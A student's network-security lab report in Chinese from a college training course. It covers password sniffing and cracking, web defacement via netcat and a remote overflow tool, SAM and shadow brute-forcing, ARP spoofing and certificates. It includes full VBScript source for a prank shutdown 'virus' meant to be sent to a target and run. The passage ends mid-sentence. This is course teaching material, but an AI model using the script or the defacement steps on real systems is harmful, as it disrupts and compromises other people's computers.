《任如意的网络作业.doc》由会员分享,可在线阅读,更多相关《任如意的网络作业.doc(10页珍藏版)》请在金锄头文库上搜索。
1、网络安全实训网络与信息安全管理实训报告系 别:计算机工程系 班 级:网09 姓 名:任如意 学 号:10503090926 指导老师:焦锋 武鹏实训时间:2011.12.12-2011.12.23 实训目的:为了使同学们在经过一学期的学习之后,对所学的知识有更加直观的了解,使动手能力得到进一步提高,同时根据学校的现有条件,特设置以下实习内容目录。目 录1 口令攻击实训32 网页篡改实训43 密码暴力破解实训54 网页恶意代码与计算机病毒实训65 数字认证实训76 ARP攻击与防护实训87 Windows 2000 IPC$入侵实训98 实训体会10一、口令攻击实训工作页工作页口令攻击学习情境
2、口令攻击学习领域网络安全班级网09姓 名任如意学习小组第二组工作时间2011年12月19日任务描述利用口令猜测与网络窃听进行口令破解1. 使用黑客字典生成器,破解口令2. 使用抓包工具进行监听并分析数据包,破解口令【实训重点及难点】重点:掌握理解口令攻击的主要方法,了解防范手段 【实训拓扑】【实训步骤】在黑客端安装sniffer嗅探工具,Wireshark网络分析工具,Cain password sniffer工具。1.使用sniffer嗅探工具,获取端口21-端口23的数据包,并加以分析。2.也可使用Wireshark网络分析工具,设置抓包条件(端口区间,ftp,telnet等),抓取并分析
3、数据包,找出包中所含的明文密码,账户信息。然后对FTP等进行攻击。3.Cain password sniffer工具是一种专业的sniffer口令工具,支持各种破解方式,服务,解码技术.5. 思考题口令攻击的防护手段有哪些?答:1、口令尽可能设置得复杂2、定时修改密码3、注意保护口令的安全。二、网页篡改实训工作页工作页首页篡改学习情境网页篡改学习领域网络安全班级网09姓 名任如意学习小组第二组工作时间2011年12月16日任务描述l 建立web站点,并发布。l 建立连接,将web站点发布在pc2上。l 利用pc1通过网络对pc2进行网页篡改,并验证。【实训重点及难点】重点:理解如何发起网页篡改
4、攻击,了解网页篡改的步骤【实训步骤】1. 为黑客端电脑准备netcat 1.11 for windows.exe(瑞士军刀) ,exbsd.exe(远程溢出工具) ,tftpd server(tftp上传下载工具)2. 在用户端主机上安装web服务并建立web站点,在其根目录下创建一个html页面。3. 在黑客端测试站点网页4. 开启一个命令行窗口,用 nc.exe 程序连接目标主机的 80 端口,输入 GET /abcdefg HTTP/1.0 并连续输入两次回车(Enter),可以从返回中获取服务器版本信息。命令中的 abcdefg 是任意字符串,是不存在的页面,会引起404错误。这么做的
5、理由是 404错误的返回页面内容比较少,便于查看。5. 用 exbsd.exe 尝试远程溢出 , 命令格式为 exbsd.exe -t 目标主机IP地址。6. 命令格式为 nc.exe 目标主机IP地址 目标端口。7.找到web网页的存放位置,使用tftp工具下载到黑客本机,进行修改8.将修改成功的html页面上传并覆盖到用户电脑,完成网页篡改实验。5. 思考题防止web服务的手段有哪些?1、 磁盘权限设置2、 SQL数据库设置3、 端口设置4、 禁用不需要的服务5、 卸载危险组件6、 更改3389端口三、密码暴力破解实训工作页工作页密码暴力破解学习情境密码暴力破解学习领域网络安全班级网09姓
6、 名 任如意学习小组第二组工作时间2011年12月20日任务描述l 系统账户数据库本地口令文件暴力破解u 暴力破解Windows下的SAM文件u 暴力破解Linux/Unix下的shadow文件l 在线远程服务口令暴力破解【实训重点及难点】重点:掌握理解如何破解SAM数据库,了解密码破解工具的使用方法,掌握安全口令的设置原则【实训步骤】1. 使用L0phtCrack5(1)在主机内建立若干用户名,将其密码分别设置为空密码、纯数字组合密码、特定单词字母密码、任意字母组合密码、字母数字混合密码以及特殊符号字母数字混合密码。(2)通过L0phtCrack5文件菜单中的LCS向导,设定从本地机器导入加
7、密口令,分别对本地机器进行“快速口令破解”和“普通口令破解”,观察破解结果(要等一段时间直到破解完全结束)。注意:若采用“复杂口令破解”方式,则需要23小时的时间破解。.设置密码原则:不小于8字符;包含有大小写英文字母、数字和特殊符号的组合;不包含姓名、用户名、单词、日期以及这几项的组合;定期修改密码。.密码破解的防护措施.Syskey工具可以使用启动密钥来保护SAM文件中的账号信息。.在“开始运行”对话框中输入“Syskey”,启用加密。2. 使用MD5Crack破解工具(1)在MD5Crack程序的“破解单个密文”文本框中输入图2生成的123456的MD5密文,确保使用的是“数字”字符集字
8、典(2)点击“开始”按钮,开始MD5破解,简单有规律的明文生成的MD5密文将很快被破解出来。3. 暴力破解linux下的shadow文件(1)点击Windows开始菜单中的“运行”,输入cmd,确定后系统会调用cmd命令行界面。(2)使用cd命令,跳转到john解压的run目录(这里解压到d盘的john1701目录)(3)将我们提供的字典文件pass.txt和Linux/Unix账户信息文件shadow复制到run目录,以便破解。(4)直接输入 # john-386.exe -wordlist=pass.txt -rules shadow5. 思考题系统账户数据库在哪里?:WINDOWSsys
9、tem32configSAM 四、网页恶意代码与计算机病毒实训工作页工作页网页恶意代码与计算机病毒学习情境 网页恶意代码与计算机病毒学习领域网络安全班级网09 姓 名任如意学习小组第二组工作时间2011年12月22日任务描述l 尝试编写一段病毒程序,并测试验证。【实训重点及难点】重点:掌握理解计算机病毒的原理,了解遭到计算机病毒攻击的现象【实训步骤】1. 病毒源码:on error resume next dim WSHshellA set WSHshellA = wscript.createobject(wscript.shell) WSHshellA.run cmd.exe /c shut
10、down -r -t 60 -c 你好,信不信一分钟关你机,除非说你是猪,不信,试试 ,0 ,true dim a do while(a 我是猪) a = inputbox (说我是猪,就不关机,快撒,说 我是猪,说不说,不说,就关机,8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox loop msgbox chr(13) + chr(13) + chr(13) + 早说就行了嘛 dim WSHshell set WSHshell = wscript.createobject(wscript.shell) WSHshell.r
11、un cmd.exe /c shutdown -a,0 ,true msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈,真过瘾 2. 将以上代码复制到txt文本编辑器中保存,将扩展名改为 .vbe ,传送到目标机器运行。5. 思考题计算机病毒可能传播病毒的途径?答:通过软盘,通过网络,通过光盘,通过硬盘 五、数字认证实训工作页工作页数字认证学习情境数字认证学习领域网络安全班级网09 姓 名任如意学习小组第二组工作时间2011年12月21日任务描述l 申请并安装一个客户端证书 l 查看X509数字证书包含的基本信息l 查看处理后证书请求的状态 l 吊销一个证书,并
12、查看证书吊销列表【实训重点及难点】重点:掌握数字证书的配置内容及配置方法,了解数字证书的作用及使用方法,掌握使用数字证书访问安全站点的方法 【实训步骤】点击开始-程序-管理工具-证书颁发机构,打开证书颁发机构界面展开Course Root CA,并选择颁发的证书,窗口右边的已颁发证书列表中可以看到证书颁发机构已经颁发过一个证书右击该证书,选择所有任务,再点击吊销证书在弹出的窗口中,理由选择密钥泄漏,然后点击”是”在展开的Course Root CA下选择吊销的证书,可以在右边的吊销列表中看到刚才吊销的证书,在右边列表的空白地方右击,然后选择所有任务,再点击发行,在吊销证书列表中双击刚才吊销的证
13、书,查看信息,可以发现该证书已经显示为被颁发机构吊销, 关闭窗口。 六、 ARP攻击与防护实训工作页工作页ARP攻击与防护学习情境ARP攻击与防护学习领域网络安全班级网09 姓 名任如意学习小组第二组工作时间2011年12月13日任务描述根据拓扑实施ARP攻击【实训重点及难点】重点:掌握理解ARP欺骗攻击,了解抵御方法【实训拓扑】【实训步骤】1. 在黑客端准备sniffer抓包工具,在软件的自定义过滤器中选择IP ARP,ARP,ICMP等,运行工具;2. 通过对抓取的包分析,获知网关与用户的IP和MAC地址,在命令提示符中输入ipconfig /all找出自己的IP地址和MAC地址;3. 使用抓取的一个ARP包进行修改,修改完成后将以此种身份向目标主机发送虚假的数据包信息。5. 思考题 1.ARP协议工作原理是什么:ARP协议建立IP地址与MAC地址之间的对应(映射)关系,TCP/IP协议栈维护着一个ARP cache表,在构造网络数据包时,首先
